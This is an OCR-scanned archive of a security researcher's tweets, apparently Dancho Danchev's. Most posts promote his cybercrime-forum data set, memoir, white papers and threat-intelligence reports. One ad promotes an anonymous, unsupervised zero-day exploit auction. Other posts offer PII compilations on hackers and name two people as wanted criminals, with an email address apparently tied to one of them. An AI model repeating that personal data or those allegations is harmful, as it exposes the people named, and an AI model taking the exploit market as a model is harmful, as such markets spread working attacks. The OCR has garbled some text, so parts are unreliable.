Spam Phishing and Malware Campaigns Including Botnet 
and Money Mule Recruitment Scams Traced Down to Their 


Source Including Various Underground Market Propositions 
Exposed 


https://ddanchev.blogspot.com 


Dancho Danchev 


28 - Saturday 
01:21 


I’m currently offering access to a 19GB Cybercrime Forum Data Set which consists of 
111 full offline copies of popular cybercrime forum communities ready for processing 
and enrichment. Drop me a line at dancho.danchev@hush.com in order to obtain 
access. https://t.co/LrliW6w7e8U 
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<parent> Darkmoney iHonker ShadowMarket 
11Wang DarkWeb LinkFeed SkyFraud 
365Exe DomenForum Linuxac.org Spyhackerz 
419eater Eviloctal Master-X Svuit.vn 
4HatDay Exelab MasterWebs Szenebox 
aHack Forum-UINSell MaulTalk Szuwi 
Aljyyosh Forum.Zloy.bz Mmpg.ru Tenebris 
Antichat.ru ForumSape = Mr11-11mr.7olm.org TheBot 
ArmadaBoard ForumSEO Nullnoss.org Toolbabase.se 
BigFozzy Free-hack pay-per-install.org TotalBlackhat 
BlackhatWorld ghostmarket.net PhreakerPro Turkhackteam 
BPCForum Gla.vn Piratebuhta.pw Vsehobby 
Cardvilla GoFuckBiz ProCrd Webmasters.ru 
Chf gofuckbiz.com ProLogic Whitehat.vn 
CNHonker H4kurd.com Promarket WWH-Club 
CNSec Hack-Port ProxyBase www.opensc.ws 
Crack-Forum Hackersoft scamwarners Xakep.bg 
Cracked to Hackingboard SEOCafe Xakepok 
Cyberizm Hackings SEOForum Zismo 
Darkmarket.la iFud 


06:59 


Who wants to obtain commercial access to my Cybercrime Forum Data Set for 2021 
and 2019 which consists of approximately 111 full offline copies of cybercrime 
friendly forum communities and is currently 19GB? Drop me a line at 
dancho.danchev@hush.com https://t.co/YzgEtCy3WP 


= 4HatDay.rar 

=e 11Wang.rar 

= aHack.rar 

= Aljyyosh.rar 

N=} alligator.cash.rar 
BS Antichat.ru.rar 
eS ArmadaBoard.rar 
BS BigFozzy.rar 

eS BlackhatWorld.rar 
= blacktip.top.rar 


07:00 


Who wants to obtain commercial access to my Cybercrime Forum Data Set for 2021 
and 2019 which consists of approximately 111 full offline copies of cybercrime 
friendly forum communities and is currently 19GB? Drop me a line at 
dancho.danchev@hush.com https://t.co/kgHppXACLr 
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07:01 


= ghostmarket.net.rar 
= Gla.vn.rar 

= gofuckbiz.com.rar 
$B GoFuckBiz.rar 

=e hOst.pw.rar 

= H4kurd.com.rar 
N= hack-academy.ru.rar 
N= hackademics.fr.rar 
= Hackersoft.rar 

= Hackingboard.rar 
= Hackings.rar 

$2 Hack-Port.rar 


Who wants to obtain commercial access to my Cybercrime Forum Data Set for 2021 


and 2019 which consists of approximately 111 full offline copies of cybercrime 
friendly forum communities and is currently 19GB? Drop me a line at 
dancho.danchev@hush.com https://t.co/LMad78CKx1 


23:55 


= ProLogic.rar 
= Promarket.rar 


= ProxyBase.rar 


S red.ug.rar 
=e replace.org.ua.rar 


N= reversing.cc.rar 


S russiancarder.ru.rar 


BS security-teams.net.rar 


$B se0Cafe.rar 
= SEOForum.rar 
= shadowcrew-2.rar 


Dear friends and colleagues. Today I’m offering a special discount to anyone who 
requests commercial access to my Cybercrime Forum Data Set for 2021 including 


2019. Drop me a line at dancho.danchev@hush.com https://t.co/IKagqiH27pl 
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23:56 


Dear friends and colleagues. Today I’m offering a special discount to anyone who 
requests commercial access to my Cybercrime Forum Data Set for 2021 including 
2019. Drop me a line at dancho.danchev@hush.com https://t.co/7MfpfuU1Mx 


23:57 


Dear friends and colleagues. Today I’m offering a special discount to anyone who 
requests commercial access to my Cybercrime Forum Data Set for 2021 including 
2019. Drop me a line at dancho.danchev@hush.com https://t.co/2VkW2FaAZO 
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23:58 
Dear friends and colleagues. Today I’m offering a special discount to anyone who 
requests commercial access to my Cybercrime Forum Data Set for 2021 including 
2019. Drop me a line at dancho.danchev@hush.com https://t.co/ch6pmrzoOlf 


30 - Monday 


03:07 
Folks. Check out my most recent white paper for @whoisxmlapi in combination with 
@MaltegoHQ - https://t.co/GqsdW8qGNw https://t.co/bgQUxidumf 


Ww 


WhoisX!ViLAPI 


03:08 


Here’s my second white paper for @whoisxmlapi in combination with @MaltegoHQ - 
https://t.co/esCOMMUK5M https://t.co/js734RDWUR 
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WhoisX/ViLAPI 


31 - Tuesday 


00:30 


https://t.co/qLxz4GuRip #security #cybercrime #malware #CyberSecurity 
#cyberattacks #Threatintel #threatintelligence https://t.co/1rJTGslvBc 
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Cyber 
Intelligence 


September 


3 - Friday 


09:17 


@whoisxmlapi DNS security researcher Dancho Danchev shared a list of 993 known 
email addresses with connections to Conficker domain registrations. - 
https://t.co/dwF2QbDThu #security #cybercrime #malware #CyberSecurity 
#CyberAttack 
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8 - Wednesday 


00:30 


https://t.co/O3mkFmssMT #security #cybercrime #malware #CyberSecurity 
#cyberattacks #ThreatHunting #Threatintel #Threatintelligence 


*1 
00:30 
https://t.co/IZXJSQAUrL #security #cybercrime #malware #CyberSecurity 
#cyberattacks #ThreatHunting #Threatintel #Threatintelligence 
*1 
00:31 


https://t.co/66PcMI2VqM #security #cybercrime #malware #CyberSecurity 
#cyberattacks #ThreatHunting #Threatintel #Threatintelligence 


*1 
00:31 
https://t.co/LQ2hr3wzpO #security #cybercrime #malware #CyberSecurity 
#cyberattacks #ThreatHunting #Threatintel #Threatintelligence 
*1 
00:40 


Folks. I’m trying to re-build my Twitter network of followers. Are you reading this? 
Can you possibly RT so that | can once again gain more followers and get back 
officially on Twitter again? Much appreciated. Cheers! 


00:43 


Q: How did you start your career? A: It’s by coming across this President Nixon’s 
quote on the CIA - "What use are they? They’ve got over 40,000 people over there 
reading newspapers.” which is how | got involved in #OSINT as an independent 
contractor. 


<1 *2 
00:46 


Who wants a full copy of my personal blog (https://t.co/JTcqOaYgET)? Get a copy in 
multiple E-Book formats from here - https://t.co/JT676NfPZI Enjoy! RT pls! #security 
#cybercrime #malware #CyberSecurity #cyberattacks #ThreatHunting #Threatintel 


21 
00:47 
This is all of my research which | did for @Webroot during 2012-2014 in multiple 


E-Book formats. Get a full copy here - https://t.co/eVsxfo6tWx #security #cybercrime 
#malware #CyberSecurity #cyberattacks #ThreatHunting #Threatintel 


00:48 


And this is all of my research and articles which | did for @ZDNet during 2008-2012. 
Grab a full copy in various E-Book formats here - https://t.co/JKEO67UcqWw #security 
#cybercrime #malware #CyberSecurity #cyberattacks #ThreatHunting 


ral 


00:49 


Interested in learning more about cyber warfare? This is my articles compilation for 
https://t.co/BKKLYQSBQB which is my personal E-Shop for intelligence deliverables 
available in multiple E-book formats. Grab a full copy here - https://t.co/Xolw3nvMqY 


00:50 


And here’s a compilation of article on various privacy topics from my Medium 
account (https://t.co/sMWCGUWR6gq) available in multiple E-book formats - 
https://t.co/k5QSE62Vkc #security #cybercrime #malware #CyberSecurity 

#cyberattacks #ThreatHunting 


23 
00:52 


Hey @MaltegoHQ - check out this graph available in my report on Iran’s CNE 
capabilities from 2015 - https://t.co/fRbK11tuUD CC: @Treadstone71LLC - Jeffrey I’m 
sure that you'll find this report pretty informative. RT pls. #security #cybercrime 
#malware 


00:53 
Hey @Treadstone71LLC here’s the second version of the original report on Iran’s CNE 
capabilities which I’m sure that you'll find informative - https://t.co/p6siiRueVF RT pls! 
00:54 


Folks. Here’s a full copy of my "Astalavista Security Newsletter" which | did while | 
was running the portal during 2003-2006 available in multiple E-book formats - 
https://t.co/dfBji24CcX knowledge is everything! Stay tuned! 


00:55 


Want to know more about #malware and how | actually made it to @slashdot once? 
Check out my "Malware - Future Trends" paper here - https://t.co/8wfdqxgEcX and 
here’s the actual Slashdot article - https://t.co/ogWebSViBO 


00:57 


Here’s an informative white paper which | did for @TechGenix in particularly - 
https://t.co/RSFlvVailc at the time which is basically a how-to on building and 
implementing security policies - https://t.co/GuxdGVTDoM 


00:58 


Do you remember my Koobface research? Here’s the actual video presentation from 
@CybercampEs which | did in 2016 as a Keynote - https://t.co/erFRtsgxNM #security 
#cybercrime #malware #CyberSecurity #cyberattacks #ThreatHunting 
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=3 
00:59 
Interested in learning more about | got into OSINT/cybercrime research and threat 
intelligence? Here’s my 2021 memoir available in multiple E-book formats - 


https://t.co/WeZmxLgin2 #security #cybercrime #malware #CyberSecurity 
#cyberattacks #ThreatHunting 


01:01 
Cyber Threat Actors? The bad guys? You wish. Here’s my 2021 compilation of 


personally identifiable information on major and popular cyber threat actors available 
for download - https://t.co/BGwwYV5mz6 RPT pls! 


01:06 
Did you know? Oleksandr Vitalyevich leremenko and Danil Potekhin which are on the 
U.S Secret Service’s Most Wanted List run a managed Android malware enterprise 


including a Black Energy DDoS botnet. Here’s the analysis - https://t.co/wtf66GHZ1S 
RT pls! https://t.co/5jTkk9facS 
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potekhini4@bk.ru 
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ANDROID 
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01:32 


Check this out! 113,500 Conficker domains courtesy of Microsoft -&gt; cross-checked 
using @whoisxmlapi’s current and historical WHOIS records database to look for 
clues -&gt; the majority of domain registrants use QQ as an email provider - 
https://t.co/woPPY5BB2F 


9 - Thursday 


01:10 


https://t.co/oUTxPavoAg #security #cybercrime #malware #CyberSecurity 
#CyberAttack #Threatintelligence #ThreatHunting https://t.co/jQcC9RYRzZ4a 


HNNCast052110 


Eli Like Share ¥ Flag as objectionable or broken - 1 Views - 1 Collector 


10 - Friday 


20:13 


https://t.co/tRytd1Tx4k #security #cybercrime #malware #CyberSecurity 
#ThreatHunting #threatintelligence 


11 - Saturday 


00:19 


https://t.co/yEOAC3QNpp #security #cybercrime #malware #CyberSecurity 
#threatintelligence 


07:11 


Search engine for hackers and security experts. 3.5M results and counting - 
https://t.co/HfeLycnF4e check out the front page here - https://t.co/fnswrm8KWP 
Enjoy! https://t.co/vAdmVUCrLo 


Web Search by the People, 
for the People 


14 - Tuesday 


02:01 


https://t.co/nNsXMPrGiO #security #cybercrime #malware #CyberSecurity 
#ThreatHunting #Threatintel #threatintelligence https://t.co/PTp6ACcKPfC 


Intell on the Criminal 


Underground - Who’s Who in 
Cyber Crime for 2007? 


02:02 


https://t.co/WeZmxLgin2 #security #cybercrime #malware #CyberSecurity 
#ThreatHunting #Threatintel #threatintelligence https://t.co/xw1X2l1uDr 
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The Definite Cybercrime and Web 2.0 Memoir 
Courtesy of Dancho Danchev 


The RBN, The Koobface Botnet, The Rock Phish Gang, 
Spam Phishing and Malware Campaigns Including Botnet 
and Money Mule Recruitment Scams Traced Down to Their 
Source Including Various Underground Market Propositions 
Exposed 


https://ddanchev.blogspot.com 


Dancho Danchev 


02:03 


https://t.co/kyI5GvScSi #security #cybercrime #malware #CyberSecurity 
#ThreatHunting #Threatintel #threatintelligence https://t.co/SWRx0zZqIA 
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02:10 


https://t.co/uvAt5gK9BA #security #cybercrime #malware #CyberSecurity 
#ThreatHunting #Threatintel #threatintelligence https://t.co/2dq45bM1z1 
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14:52 


https://t.co/H7ZRZUN59S #security #cybercrime #malware #CyberAttack 
#ThreatHunting #Threatintel #Threatintel #threatintelligence https://t.co/jISHaPKfK6 
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T5tlt 


https://t.co/H7ZRZUN59S #security #cybercrime #malware #CyberAttack 
#ThreatHunting #Threatintel #threatintelligence https://t.co/rxKxYYpGLK 
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18 - Saturday 


07:20 


https://t.co/JTcqOaYgET has come to an end?! The blog has a new address - 
https://t.co/DjegbOF3Wx bookmark it today and visit it on a daily basis! Keep it cool! 
Image courtesy of a loyal blog fan. Second image courtesy of me while attending a 
private party! https://t.co/3XSou8VIikn 
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07:26 


https://t.co/Kkm3ThT8W2 #security #cybercrime #malware #CyberSecurity 
#Threatintel #ThreatHunting #Threatintelligence 


20 - Monday 


12:53 


https://t.co/327gMDfvFr #security #cybercrime #malware #cybersecurity 
#threatintel #ThreatHunting 


22 - Wednesday 


06:35 
My corporate head shot circa 2012. https://t.co/8ZV18qfGOK 
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29 - Wednesday 


10:16 


Check this out and don’t forget to "stay tuned". Setting them straight since the early 
days of humankind - https://t.co/DjegobOF3Wx Cheers! Dancho #security 
#cybercrime #malware #CyberSecurity #ThreatHunting #Threatintel 
#Threatintelligence https://t.co/joYJn64pul 
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1 - Friday 


11:50 


God bless. #security #cybercrime #malware #CyberSecurity #Threatintel 
#ThreatHunting https://t.co/F3cWRANhRm 
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12:13 


Happy Friday! #security #cybercrime #malware #CyberSecurity #Threatintel 
#ThreatHunting https://t.co/eAcRC1EGnu 
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12:24 


21 ¥*1 


Cheers! #security #cybercrime #malware #CyberSecurity #Threatintel 
#ThreatHunting https://t.co/xbvMtjWK3I 
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13:32 
#NowPlaying - https://t.co/tJSBZLmXou 


2 - Saturday 


05:18 
Re-defining the very basics of what shapes us on a daily basis - high quality and 


constructive and never-published before threat intelligence and OSINT analysis 
cybercrime research. Check this out - https://t.co/DjegobOF3Wx 
https://t.co/H3al9OIGvY 
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05:19 


Check this out! - https://t.co/DjegoOF3Wx #security #cybercrime #malware 
#CybersecurityAwarenessMonth #Threatintel #ThreatHunting #threatintelligence 
https://t.co/zpbdzbNs3Y 
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14:04 


Friends and colleagues. This is Dancho. Do you invest in cyber security projects? Do 
you want to work with me? I’m in an urgent need of an investor for a project with a 
total requested amount in $5,000 in BitCoin. Drop me a line at 
dancho.danchev@hush.com https://t.co/sDaGt3iVDW 


Zero Day Exploit Auction 


We're a partnership between the world’s leading expert in the field of cybercrime research OSINT and threat intelligence gathering 
Dancho Danchev and one of the Web's most popular destinations for hackers and security experts since 1994 the infamous 
Astalavista. box.sk where we aim to set the foundationds for a ground-breaking and fully working Zero Day Exploits auction business 
model where users researchers vendors and companies can buy and sell exploits in an anonymous and fully automated without any 
sort of supervision fashion where the ultimate goal would be to improve everyone's security and provide the necessary publicity and 
financial incentive for researchers and users to submit buy and sell their exploits online 


Current Project Statistics: 
Exploits: 36,640 | Researchers: 44,134 


Multiple Local Versions for This Project Include: 
Russia | Germany | Turkey | France | Italy | Spain | Romania | Poland | Argentina | Japan | China | 


Zero Day Exploit and 
Vulnerability Auction 
Please contact us via mail ( 

or XMPP/Jabber/OMEMO ( 


) with your exploit and vulnerability submissions! 
PGP Key: 


https://astalavista.box.sk/Dancho_Danchev.asc 


15:30 


https://t.co/JIcqOaYgET #security #cybercrime #malware #CyberSecurity 
#Threatintelligence #ThreatHunting https://t.co/DWc7JPuTd7 
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3 - Sunday 


14:50 


Here’s my latest compilation of @ProtonMail and @TutanotaTeam themed 
ransomware email accounts. Let’s make it happen! - https://t.co/yOdOTLxYa8 ; 
https://t.co/8IIdBA940f #security #cybercrime #malware #ThreatHunting 
#threatintelligence #threatintel https://t.co/dD4GDTahla 
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4 - Monday 
00:04 
RT @TutanotaTeam: @dancho_danchev @ProtonMail Thanks for reporting, we'll look 
into this! 
00:05 


Folks. Check out my new Dark Web Onion address which is - https://t.co/65pZhsbELh 
#security #cybercrime #malware #CyberSecurity #threatintelligence 
https://t.co/vXhk7R2tKK 
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22:57 
https://t.co/ixAOmiAO0O0d 


6 - Wednesday 


13:21 


A Compilation of Currently Active and Related Scams Scammer Email Addresses - An 
OSINT Analysis - https://t.co/HBrH9cBDib #security #cybercrime #malware 
#CyberAttack #threatintel #threatintelligence 


13:21 


A Compilation of Currently Active Cyber Jihad Themed Personal Email Addresses - An 
OSINT Analysis - https://t.co/HBrH9ck2qD #security #cybercrime #malware 
#CyberAttack #threatintel #threatintelligence 


13:22 


A Compilation of Currently Active Full Offline Copies of Cybercrime-Friendly Forum 
Communities - Direct Technical Collection Download -[RAR] - https://t.co/HBrH9cBDib 
#security #cybercrime #malware #CyberAttack #threatintel #threatintelligence 


13:22 


A Compilation of Personally Identifiable Information on Various Iran-based Hacker 
Groups and Lone Hacker Teams - Direct Technical Collection Download - [RAR] - 
https://t.co/HBrH9cBDib #security #cybercrime #malware #CyberAttack #threatintel 


13:22 


A Koobface Botnet Themed Infographic Courtesy of my Keynote at CyberCamp - A 
Photo - https://t.co/HBrH9cBDib #security #cybercrime #malware #CyberAttack 
#threatintel #threatintelligence 


13:22 


Advanced Bulletproof Malicious Infrastructure Investigation - WhoisXML API Analysis - 
https://t.co/HBrH9cBDib #security #cybercrime #malware #CyberAttack 
#threatintel #threatintelligence 


cael | 
13:23 
Advanced Mapping and Reconnaissance of Botnet Command and Control 
Infrastructure using Hostinger’s Legitimate Infrastructure - WhoisXML API Analysis - 
https://t.co/HBrH9ck2qD #security #cybercrime #malware #CyberAttack 
#threatintel #threatintelligence 


13:23 


Advanced Mapping and Reconnaissance of the Emotet Botnet - WhoisXML API 
Analysis - https://t.co/HBrH9cBDib #security #cybercrime #malware #CyberAttack 
#threatintel #threatintelligence 
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13:23 


Assessing The Computer Network Operation (CNO) Capabilities of the Islamic 
Republic of Iran - Free Research Report - https://t.co/HBrH9ck2qD #security 
#cybercrime #malware #CyberAttack #threatintel #threatintelligence 


13:24 


Astalavista Security Newsletter - 2003-2006 - Full Offline Reading Copy - 
https://t.co/HBrH9cBDib #security #cybercrime #malware #CyberAttack 
#threatintel #threatintelligence 


13:24 


Compilations of Personally Identifiable Information Including XMPP/Jabber and 
Personal Emails Belonging to Cybercriminals and Malicious Threat Actors 
Internationally - An OSINT Analysis - https://t.co/HBrH9ck2qD #security #cybercrime 
#malware #CyberAttack 
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Cyber Intelligence - Personal Memoir - Dancho Danchev - - Download Free Copy 
Today! - https://t.co/HBrH9cBDib #security #cybercrime #malware #CyberAttack 
#threatintel #threatintelligence 


13:25 


Cybercriminals Impersonate Legitimate Security Researcher Launch a Typosquatting 
C&amp;C Server Campaign - WhoisXML API Analysis - https://t.co/HBrH9cBDib 
#security #cybercrime #malware #CyberAttack #threatintel #threatintelligence 


13:25 


Dancho Danchev - Cyber Intelligence - Personal Memoir - Direct Download Copy 
Available - https://t.co/HBrH9cBDib #security #cybercrime #malware #CyberAttack 
#threatintel #threatintelligence 


13:25 


Dancho Danchev’s “A Qualitative and Technical Collection OSINT-Enriched Analysis of 
the Iranian Hacking Scene Through the Prism of the Infamous Ashiyane Digital 
Security Team” Report - [PDF] - https://t.co/HBrH9ck2qD #security #cybercrime 


13:25 


Dancho Danchev’s “Assessing The Computer Network Operation (CNO) Capabilities of 
the Islamic Republic of Iran” Report - [PDF] - https://t.co/HBrH9cBDib #security 
#cybercrime #malware #CyberAttack #threatintel #threatintelligence 


13:26 


Dancho Danchev’s “Astalavista Security Group - Investment Proposal” Presentation - 
A Photos Compilation - https://t.co/HBrH9ck2qD #security #cybercrime #malware 
#CyberAttack #threatintel #threatintelligence 
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13:26 


Dancho Danchev’s “Building and Implementing a Successful Information Security 
Policy” White Paper - [PDF] - https://t.co/HBrH9ck2qD #security #cybercrime 
#malware #CyberAttack #threatintel #threatintelligence 


13:26 


Dancho Danchev’s “Cyber Jihad vs Cyberterrorim - Separating Hype from Reality” 
Presentation - [PDF] - https://t.co/HBrH9ck2qD #security #cybercrime #malware 
#CyberAttack #threatintel #threatintelligence 


13:26 


Dancho Danchev's “Cyber Jihad vs Cyberterrorism - Separating Hype from Reality - A 
Photos Compilation - https://t.co/HBrH9ck2qD #security #cybercrime #malware 
#CyberAttack #threatintel #threatintelligence 


13:27 


Dancho Danchev’s “Exposing Koobface - The World’s Largest Botnet” Presentation - 
A Photos Compilation - https://t.co/HBrH9cBDib #security #cybercrime #malware 
#CyberAttack #threatintel #threatintelligence 


13:27 


Dancho Danchev’s “Exposing Koobface - The World’s Largest Botnet” Presentation - 
[PDF] - https://t.co/HBrH9ck2qD #security #cybercrime #malware #CyberAttack 
#threatintel #threatintelligence 


13:27 


Dancho Danchev’s “Exposing the Dynamic Money Mule Recruitment Ecosystem” 
Presentation - A Photos Compilation - https://t.co/HBrH9ck2qD #security 
#cybercrime #malware #CyberAttack #threatintel #threatintelligence 


13:27 


Dancho Danchev’s “Exposing the Dynamic Money Mule Recruitment Ecosystem” 
Presentation - [PDF] - https://t.co/HBrH9cBDib #security #cybercrime #malware 
#CyberAttack #threatintel #threatintelligence 


13:28 


Dancho Danchev’s “Intell on the Criminal Underground - Who's Who in Cybercrime 
for ” Presentation - [PDF] - https://t.co/HBrH9cBDib #security #cybercrime #malware 
#CyberAttack #threatintel #threatintelligence 


21 
13:28 
Dancho Danchev’s “Intell on the Criminal Underground - Who's Who in Cybercrime 


for ?” - A Photos Compilation - https://t.co/HBrH9ck2qD #security #cybercrime 
#malware #CyberAttack #threatintel #threatintelligence 
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13:28 


Dancho Danchev’s - Cybercrime Forum Data Set - Free Direct Technical Collection 
Download Available - 19 GB - [RAR] - https://t.co/HBrH9ck2qD #security #cybercrime 
#malware #CyberAttack #threatintel #threatintelligence 


13:29 

Dancho Danchev’s Blog - Full Offline Copy Available - [PDF] - https://t.co/HBrH9ck2qD 
#security #cybercrime #malware #CyberAttack #threatintel #threatintelligence 

13:29 


Dancho Danchev’s Comeback Livestream Today - Join me on Facebook Live! - 
https://t.co/HBrH9ck2qD #security #cybercrime #malware #CyberAttack 
#threatintel #threatintelligence 


23 
13:29 


Dancho Danchev’s CV - Direct Download Copy Available - https://t.co/HBrH9ck2qD 
#security #cybercrime #malware #CyberAttack #threatintel #threatintelligence 


<2 
13:29 
Dancho Danchev’s Cybercrime Forum Data Set for - Upcoming Direct Technical 


Collection Download Available - https://t.co/HBrH9cBDib #security #cybercrime 
#malware #CyberAttack #threatintel #threatintelligence 
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13:30 


Dancho Danchev’s Primary Contact Points for this Project - 
Email/XMPP/Jabber/OMEMO and PGP Key Accounts - https://t.co/HBrH9ck2qD 
#security #cybercrime #malware #CyberAttack #threatintel #threatintelligence 


13:30 


Dancho Danchev’s Privacy and Security Research Compilation - Medium Account 
Research Compilation - [PDF] - https://t.co/HBrH9ck2qD #security #cybercrime 
#malware #CyberAttack #threatintel #threatintelligence 


13:30 


Dancho Danchev’s Private Party Videos - Direct Video Download Available - 
https://t.co/HBrH9cBDib #security #cybercrime #malware #CyberAttack 
#threatintel #threatintelligence 


13:30 


Dancho Danchev’s Private Party Videos - Part Three - Direct Video Download 
Available - https://t.co/HBrH9ck2qD #security #cybercrime #malware #CyberAttack 
#threatintel #threatintelligence 
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21 
13:30 
Dancho Danchev’s Private Party Videos - Part Two - Direct Video Download Available - 


https://t.co/HBrH9ck2qD #security #cybercrime #malware #CyberAttack 
#threatintel #threatintelligence 


13:31 


Dancho Danchev’s Random Conference and Event Photos - A Compilation - 
https://t.co/HBrH9ck2qD #security #cybercrime #malware #CyberAttack 
#threatintel #threatintelligence 


8 - Friday 


09:44 


Introducing Dancho Danchev’s Ultimate "Cybercrime Research and Cybercrime 
Fighting Toolkit" USB Stick - Order a copy today! - https://t.co/fnswrm8KWP #security 
#cybercrime #malware #CyberSecurity #Threatintel #Threatintelligence 
#ThreatHunting https://t.co/fRtbQO002g2 
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& Dancho_Danchev_Blog_E-Book_Archive_2021 
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ad Dancho_Danchev_Cybercrime_Research_Presentations_2021 
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ad Dancho_Danchev_Interview_DW_Koobface_Botnet_MP3_2021 


a Dancho_Danchev_Iran_Hackers_Personally_Identifiable_Information_Compilation_2021 


ad Dancho_Danchev_Iran_White_Paper_2021 

) Dancho_Danchev_Iran_White_Paper_Part_Two_2021 

) Dancho_Danchev_Keynote_Koobface_Botnet_CyberCamp_2021 
ad Dancho_Danchev_Malware_Trends_White_Paper_2021 

) Dancho_Danchev_Medium_Research_Compilation_2021 

ad Dancho_Danchev_Personal_Memoir_Compilation_Research_2021 
ad Dancho_Danchev_Personal_Photos_Compilation_2021 

Xb Dancho_Danchev_Private_Party_New_Year_Videos_Compilation 
ad Dancho_Danchev_Security_Policy_White_Paper_2021 

PY) Dancho_Danchev_Twitter_Account_Archive_2021 

) Dancho_Danchev_Unit-123_Security_Research_Compilation_2021 
db Dancho_Danchev_Webroot_Research_Compilation_2021 

db Dancho_Danchev_ZDNet_Research_Compilation_2021 

LL) WhoisXML_API_Research_Articles_2021 


https://t.co/fnswrm8KWP #security #cybercrime #malware #CyberSecurity 
#Threatintel #ThreatHunting #threatintelligence https://t.co/c61KAVHgrU 
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9 - Saturday 


11:18 


https://t.co/fnswrm8KWP #security #cybercrime #malware #CyberSecurity 
#Threatintel #threatintelligence https://t.co/OuHfaolf5) 
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16:50 


Grab the Torrent! - https://t.co/tHKF82FHI3 Visit the infamous 
https://t.co/fnswrm8KWP and order a copy! Shipped and delivered every Friday! It 
would greatly help me fuel growth into my research and actually help me pay the 

bills. Stay tuned! https://t.co/5DmTct]7SO 


10 - Sunday 


05:53 


Grab the Torrent! https://t.co/tHKF82FHI3 Visit https://t.co/fnswrm8KWP and order a 
USB Stick! Regards. Dancho #security #cybercrime #malware #Threatintel 
#Threatintelligence #ThreatHunting #CyberSecurity #torrent 
https://t.co/5kWE20yKOW 
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14:21 
Next week I'll be participating in a Russian documentary on hackers. Stay tuned! 
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11 - Monday 


15:25 


Grab the Torrent! - https://t.co/tHKF82FHI3 Regards. Dancho #security #cybercrime 
#malware #CyberSecurity #ThreatHunting https://t.co/pFebszoS9W 
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12 - Tuesday 


03:32 


Grab the Torrent! https://t.co/qiAltYb2I1 Regards. Dancho #security #cybercrime 
#malware #CyberSecurity #Threatintel #Threatintelligence https://t.co/911g2tBPSG 
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14 - Thursday 


06:28 
Check out my latest paper for @whoisxmlapi - https://t.co/FHbh3cbt5d #security 
#cybercrime #malware #CyberAttack #threatintel #threatintelligence 
https://t.co/OgjOVn921i 
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To Domains and IP Addresses (Historical Reverse WHOIS Search) [WhoisXML] 


To Domains and IP Addresses (Reverse WHOIS Search) [WhoisXML] 
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To Historical WHOIS Records [WhoisXML] 


To WHOIS Records [WhoisXML] 
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06:29 
Here’s my second white paper for @whoisxmlapi - https://t.co/bKiZkmDMEq 
#security #cybercrime #malware #CyberAttack #threatintel #threatintelligence 
https://t.co/2DZLKSfF4n 
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Domain (83) 


06:30 


Here’s my third white paper for @whoisxmlapi - https://t.co/2MPVIOmKnz #security 
#cybercrime #malware #CyberAttack #threatintel #threatintelligence 
https://t.co/OejB7spFID 
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07:03 


Grab the Torrent! Cybercrime Forum Data Set for 2021 consisting of full offline copies 
of 111 cybercrime-friendly forum communities for OSINT enrichment and processing 
including all of my publicly accessible research - https://t.co/qiAltYsDcz 
https://t.co/oEY6z8Xs91 


07:15 


https://t.co/7Pzr7DCnLs #security #cybercrime #malware #CyberSecurity 
#Threatintel #Threatintelligence 


22 *1 
07:16 


https://t.co/KdTkKQMkWm1 #security #cybercrime #malware #CyberSecurity 
#Threatintel #Threatintelligence 
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07:17 


https://t.co/sZXGMvSSgK #security #cybercrime #malware #CyberSecurity 
#Threatintel #Threatintelligence 


21 *1 
07:17 
https://t.co/tg9vFXyqYU #security #cybercrime #malware #CyberSecurity 
#Threatintel #Threatintelligence 
21 *1 
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07:42 


Check out my Dark Web Onion - https://t.co/HBrH9ck2qD #security #cybercrime 
#malware #CyberSecurity #ThreatiIntel #ThreatHunting #Threatintelligence 


07:46 
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07:47 


https://t.co/bvqIPWxu5E 
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https://t.co/m65nyeOh8m 


https://t.co/2L4ifQOsHr 


https://t.co/r5ncacvDMG 


https://t.co/LRU8dgBQIk 


https://t.co/8aifeEqC44 


https://t.co/P7ZRSN3KWc 


https://t.co/zfj9PIPIXh 
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07:47 
https://t.co/K4dEMgUE7G 


07:52 


Grab a copy of my personal memoir - 2021 - https://t.co/qLxz4GuRip [PDF] #security 
#cybercrime #malware #CyberSecurity #Threatintel #ThreatHunting 
#Threatintelligence https://t.co/aLMhtJjU7f 


Cyber 


Intelligence 


The Definite Cybercrime and Web 2.0 Memoir 
Courtesy of Dancho Danchev 
The RBN, The Koobface Botnet, The Rock Phish Gang, 
Spam Phishing and Malware Campaigns Including Botnet 
and Money Mule Recruitment Scams Traced Down to Their 


Source Including Various Underground Market Propositions 
Exposed 


https://ddanchev.blogspot.com 


Dancho Danchev 


09:56 


Who remembers my work 2008-2013 and who remembers my work on the Koobface 
botnet? | need a co-editor and co-writer who can contribute with personal "from the 
trenches" perspectives and comments on my research including their research 
throughout 2008-2013? https://t.co/DOTYQB7EWH 
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09:58 


Did you enjoy the first edition of my "Cyber Intelligence" memoir? 
https://t.co/qLxz4GuRip [PDF] | need a co-editor and co-writer who remembers my 
research and story including the Koobface botnet 2008-2013? Drop mea line 
dancho.danchev@hush.com https://t.co/IYOMAQhgSZ 
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18 - Monday 


13:09 


https://t.co/cQq40tVcwD #security #cybercrime #malware #CyberSecurity 
#DarkWeb #onions #onionlinks https://t.co/niVK6OxLqY 
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20 - Wednesday 


04:10 


https://t.co/HKgAoJAGeH #security #cybercrime #malware #CyberSecurity 
#ThreatHunting #Threatintelligence #threatintel 


22 - Friday 


00:09 


Check this out! Google’s Firebase under fire using a massive phishing domains farm. 
Multiple brands affected. Check out the analysis on my Dark Web Onion - 
https://t.co/67CN61MI3F #security #cybercrime #malware #threatintelligence 
https://t.co/sSSWGWpPnF 
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00:35 


Who wants to join me in a Ask Me Anything (AMA) session using 
https://t.co/ffE3etM11H? #security #cybercrime #malware #CyberSecurity 
#ThreatHunting #threatintelligence 


22 
19:21 


https://t.co/oYUefKdlCe CC: @whoisxmlapi #security #cybercrime #malware 
#CyberSecurity #Threatintel #Threatintelligence 


2l 
19:22 


https://t.co/PPxjy2CoAK CC: @whoisxmlapi #security #cybercrime #malware 
#CyberSecurity #Threatintel #Threatintelligence 
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19:22 


https://t.co/JneXEF6qk6 CC: @whoisxmlapi #security #cybercrime #malware 
#CyberSecurity #Threatintel #ThreatIntelligence 
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28 - Thursday 


03:47 


Folks. Apologies for the downtime. Check out my official Dark Web Onion - 
Intelligence Community 2.0 - https://t.co/HBrH9ck2qD #security #cybercrime 
#malware #CyberAttack #CybersecurityAwarenessMonth #ThreatHunting 
#Threatintel https://t.co/LcSKeNMfma 
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21:19 


https://t.co/AGHOL5bI7L #security #cybercrime #malware #CyberAttack 
#CybersecurityAwarenessMonth #threatintel #ThreatHunting #threatintelligence 
#threatreport CC: @whoisxmlapi 


29 - Friday 


01:51 


